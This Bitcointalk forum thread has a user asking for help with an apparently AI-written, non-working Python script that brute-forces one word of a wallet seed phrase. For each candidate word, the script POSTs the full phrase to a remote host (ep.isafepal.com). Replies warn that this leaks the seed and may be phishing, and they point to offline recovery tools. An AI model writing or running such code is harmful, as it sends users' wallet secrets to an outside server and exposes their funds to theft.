HER4S (OP)
Newbie
Offline
Activity: 12
Merit: 0
|
|
October 04, 2023, 04:51:04 PM |
|
Hello I made a huge mistake, I have one word wrong of my recovery seed copy, I know that this is the word number 6 because my safepal S1 doesn't give me the option to use the word that I have written on my recovery copy. I made a python code to brute force this word with the words of the bip-0039 document The problem is that I don't know the API to run my python code. can someone help with this? this is the complete code: import requests def clean_word(word): return word.strip().lower() def brute_force_seed(seed, word_number): word_index = word_number while word_index < len(seed.split()): for word in english_words: print("Checking word", word) corrected_seed = seed.split() corrected_seed[word_index] = clean_word(word) corrected_seed = " ".join(corrected_seed) response = requests.post(" https://ep.isafepal.com", json={"phrase": corrected_seed}) if response.status_code == 200: return corrected_seed word_index += 1 return None with open(r"C:\Users\kkk\OneDrive\desktop\rescue\bip0039.txt", "r") as file: english_words = [clean_word(line.strip()) for line in file] seed = "word1 word2 word3 word4 word5 word6 word7 word8 word9 word10 word11 word12 word13 word14 word15 word16 word17 word18 word19 word20 word21 word22 word23 word24" word_number = 5 corrected_seed = brute_force_seed(seed, word_number) if corrected_seed is not None: print("The corrected phrase is:", corrected_seed) else: print("No match found.")
|
|
|
|
|
|
|
|
|
Be very wary of relying on JavaScript for security on crypto sites. The site can change the JavaScript at any time unless you take unusual precautions, and browsers are not generally known for their airtight security.
|
|
|
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.
|
|
|
|
LoyceV
Legendary
Offline
Activity: 3304
Merit: 16655
Thick-Skinned Gang Leader and Golden Feather 2021
|
|
October 04, 2023, 05:59:50 PM |
|
I know nothing about Python, but you shouldn't need an API for this. You should keep your seed and recovery offline. Why don't you use The FinderOuter on an offline system?
|
|
|
|
|
BlackHatCoiner
Legendary
Offline
Activity: 1512
Merit: 7366
Farewell, Leo
|
|
October 04, 2023, 08:11:10 PM Last edit: October 05, 2023, 10:37:00 AM by BlackHatCoiner |
|
This is extremely bad idea. I just read brute_force_seed. Why are you even POST-ing a request with safepal, submitting your seed phrase (!!!) to them? This is not secure. Also, why isn't there indentation in your python code? Please use either FinderOuter which comes with a friendly user interface, or btcrecover. Open-source means that every problem has to only be solved once.
|
. .BLACKJACK ♠ FUN. | | | ███▄██████ ██████████████▀ ████████████ █████████████████ ████████████████▄▄ ░█████████████▀░▀▀ ██████████████████ ░██████████████ █████████████████▄ ░██████████████▀ ████████████ ███████████████░██ ██████████ | | CRYPTO CASINO & SPORTS BETTING | | │ | | │ | ▄▄███████▄▄ ▄███████████████▄ ███████████████████ █████████████████████ ███████████████████████ █████████████████████████ █████████████████████████ █████████████████████████ ███████████████████████ █████████████████████ ███████████████████ ▀███████████████▀ ███████████████████ | | .
|
|
|
|
HER4S (OP)
Newbie
Offline
Activity: 12
Merit: 0
|
|
October 04, 2023, 08:48:17 PM |
|
I do a new post because here I'm asking about the code directly but if this is a problem I can delete one, in the other post I ask for possibilites to solve my problem
|
|
|
|
HER4S (OP)
Newbie
Offline
Activity: 12
Merit: 0
|
|
October 04, 2023, 08:58:21 PM |
|
This is extremely bad idea. I just read brute_force_seed. Why are you even requesting a POST with safepal, submitting your seed phrase (!!!) to them? This is not secure. Also, why isn't there indentation in your python code? Please use either FinderOuter which comes with a friendly user interface, or btcrecover. Open-source means that every problem has to only be solved once. I don't post my seed at anyplace I have it on paper writed by hand, I'm totally noob programing I do it correcting what a AI do for me.
|
|
|
|
BitMaxz
Legendary
Offline
Activity: 3248
Merit: 2972
Block halving is coming.
|
|
October 04, 2023, 09:14:20 PM |
|
I don't post my seed at anyplace I have it on paper writed by hand, I'm totally noob programing I do it correcting what a AI do for me.
I already told you recently from your previous thread you can use the FinderOuter tool to brute-force your seed phrase it doesn't require programming skill. And take note don't use AI to generate a script to brute-force your seed it generates sometimes unrelated codes that you can't use in brute-forcing a seed or it might generate a code that can leak your seed phrase.
|
|
|
|
simpleSliv3r
Jr. Member
Offline
Activity: 46
Merit: 28
|
|
October 04, 2023, 09:49:12 PM |
|
I don't post my seed at anyplace I have it on paper writed by hand, I'm totally noob programing I do it correcting what a AI do for me.
There're tools that can help you with that. But some tips: 1. NEVER use a script that sends your seed to some web page. THEY CAN STEAL YOUR FOUNDS! 2. Don't try to program anything if you don't know how to. 3. Don't use code generated by an IA. Just look for some tools already done.
|
|
|
|
tranthidung
Legendary
Offline
Activity: 2268
Merit: 4014
Farewell o_e_l_e_o
|
|
October 05, 2023, 01:19:51 AM |
|
I don't post my seed at anyplace I have it on paper writed by hand, I'm totally noob programing I do it correcting what a AI do for me.
Why do you trust AI for your code when you are not an experience programmer like you said? There are open source tools for you and they are coded by experts with years of testing, using and verifying by community. It's better if you trust those experts and their tools rather than trust AIs. Trust or not, like LoyceV warned you, use those tools offline. If I use those tools, I will only use it for a word in problem, not use it for all of mnemonic seed phrase because other words are fine, no need to test and take risk unnecessarily. Rather than going to the list words for like BIP39, I can use those tools to save my time with less words for one or two letters typing for search. Then I would like to manually use those possible words when I testing manually with wallet import.
|
|
|
|
LoyceV
Legendary
Offline
Activity: 3304
Merit: 16655
Thick-Skinned Gang Leader and Golden Feather 2021
|
|
October 05, 2023, 11:02:53 AM |
|
Why are you even POST-ing a request with safepal It's not SafePal, OP uses isafepal. It looks like OP is just promoting a phishing script for a phishing site.
|
|
|
|
HER4S (OP)
Newbie
Offline
Activity: 12
Merit: 0
|
|
October 05, 2023, 11:05:07 AM |
|
I don't post my seed at anyplace I have it on paper writed by hand, I'm totally noob programing I do it correcting what a AI do for me.
I already told you recently from your previous thread you can use the FinderOuter tool to brute-force your seed phrase it doesn't require programming skill. And take note don't use AI to generate a script to brute-force your seed it generates sometimes unrelated codes that you can't use in brute-forcing a seed or it might generate a code that can leak your seed phrase. Unfortunately FinderOuter is not working for me I will try with btcrecover, yes I know that the AI do unrelated code and that is what I changed, I don't know how to program well but I understand what the code is saying
|
|
|
|
NotATether
Legendary
Offline
Activity: 1596
Merit: 6740
bitcoincleanup.com / bitmixlist.org
|
Unfortunately FinderOuter is not working for me I will try with btcrecover, yes I know that the AI do unrelated code and that is what I changed, I don't know how to program well but I understand what the code is saying
First of all, put your code in code tags, like this: This makes your code easier to read. Second, you cannot brute force anything using a network request because this is limited by your network speed, your ping, the server's rate-limited network speed, and did I mention they can throttle you or just completely block requests from your IP addresses? In other words, it is extremely slow. Nobody does this. 3rd, the network resource you're hitting does not exist, that's why it's returning 404.
|
. .BLACKJACK ♠ FUN. | | | ███▄██████ ██████████████▀ ████████████ █████████████████ ████████████████▄▄ ░█████████████▀░▀▀ ██████████████████ ░██████████████ █████████████████▄ ░██████████████▀ ████████████ ███████████████░██ ██████████ | | CRYPTO CASINO & SPORTS BETTING | | │ | | │ | ▄▄███████▄▄ ▄███████████████▄ ███████████████████ █████████████████████ ███████████████████████ █████████████████████████ █████████████████████████ █████████████████████████ ███████████████████████ █████████████████████ ███████████████████ ▀███████████████▀ ███████████████████ | | .
|
|
|
|
HER4S (OP)
Newbie
Offline
Activity: 12
Merit: 0
|
|
October 05, 2023, 11:15:20 AM |
|
Unfortunately FinderOuter is not working for me I will try with btcrecover, yes I know that the AI do unrelated code and that is what I changed, I don't know how to program well but I understand what the code is saying
First of all, put your code in code tags, like this: This makes your code easier to read. Second, you cannot brute force anything using a network request because this is limited by your network speed, your ping, the server's rate-limited network speed, and did I mention they can throttle you or just completely block requests from your IP addresses? In other words, it is extremely slow. Nobody does this. 3rd, the network resource you're hitting does not exist, that's why it's returning 404. ok if this is not an API Then against what I need to launch the code?
|
|
|
|
NotATether
Legendary
Offline
Activity: 1596
Merit: 6740
bitcoincleanup.com / bitmixlist.org
|
|
October 05, 2023, 11:20:12 AM |
|
ok if this is not an API Then against what I need to launch the code?
First, find out what type of wallet you are trying to brute force if you haven't already. I have a suspicion that you are not so sure exactly what type of wallet you have. Once you find the wallet format, see if it has a Python package that can programmatically open & read it, and then build a script around that (potentially using ChatGPT if it is one of the more well known packages, but you should at least make an effort to learn just enough Python to write one yourself).
|
. .BLACKJACK ♠ FUN. | | | ███▄██████ ██████████████▀ ████████████ █████████████████ ████████████████▄▄ ░█████████████▀░▀▀ ██████████████████ ░██████████████ █████████████████▄ ░██████████████▀ ████████████ ███████████████░██ ██████████ | | CRYPTO CASINO & SPORTS BETTING | | │ | | │ | ▄▄███████▄▄ ▄███████████████▄ ███████████████████ █████████████████████ ███████████████████████ █████████████████████████ █████████████████████████ █████████████████████████ ███████████████████████ █████████████████████ ███████████████████ ▀███████████████▀ ███████████████████ | | .
|
|
|
|
HER4S (OP)
Newbie
Offline
Activity: 12
Merit: 0
|
|
October 05, 2023, 11:31:28 AM |
|
ok if this is not an API Then against what I need to launch the code?
First, find out what type of wallet you are trying to brute force if you haven't already. I have a suspicion that you are not so sure exactly what type of wallet you have. Once you find the wallet format, see if it has a Python package that can programmatically open & read it, and then build a script around that (potentially using ChatGPT if it is one of the more well known packages, but you should at least make an effort to learn just enough Python to write one yourself). My wallet is a safepal, the address that I have is a legacy
|
|
|
|
BlackHatCoiner
Legendary
Offline
Activity: 1512
Merit: 7366
Farewell, Leo
|
|
October 05, 2023, 12:32:05 PM |
|
It's not SafePal, OP uses isafepal. It looks like OP is just promoting a phishing script for a phishing site. There is nothing in isafepal dot com. There might be in the future, but there isn't now. They also said they used an AI to write this up, so it could just be a mistake. Once you find the wallet format, see if it has a Python package that can programmatically open & read it, and then build a script around that (potentially using ChatGPT if it is one of the more well known packages, but you should at least make an effort to learn just enough Python to write one yourself). Why should they run a completely new program when there are two well tested already? But, besides that. Judging by the lack of technical competence, it's ignorant to think they are capable of doing this correctly. Recalling that their approach was more akin to a DoS attack than a brute force attempt on their seed phrase.
|
. .BLACKJACK ♠ FUN. | | | ███▄██████ ██████████████▀ ████████████ █████████████████ ████████████████▄▄ ░█████████████▀░▀▀ ██████████████████ ░██████████████ █████████████████▄ ░██████████████▀ ████████████ ███████████████░██ ██████████ | | CRYPTO CASINO & SPORTS BETTING | | │ | | │ | ▄▄███████▄▄ ▄███████████████▄ ███████████████████ █████████████████████ ███████████████████████ █████████████████████████ █████████████████████████ █████████████████████████ ███████████████████████ █████████████████████ ███████████████████ ▀███████████████▀ ███████████████████ | | .
|
|
|
|
Initscri
|
|
October 10, 2023, 06:06:54 AM |
|
To confirm as well, safepal leverages cloudflare DNS for their site - if they also use this to protect their API (which I assume they do) you're going to run into massive issues bruteforcing their API - it isn't going to work... you 100% will get throttled. https://dnschecker.org/#NS/safepal.comhttps://dnschecker.org/#A/ep.isafepal.com (A records point to CloudFlare - http://104.18.8.24/) As others have mentioned, try seeing if you can get access to a file instead, and running code against that. Leveraging an API won't get you what you need without getting blacklisted/IP banned.
|
---------------------------------- Web Developer. PM for details. ----------------------------------
|
|
|
|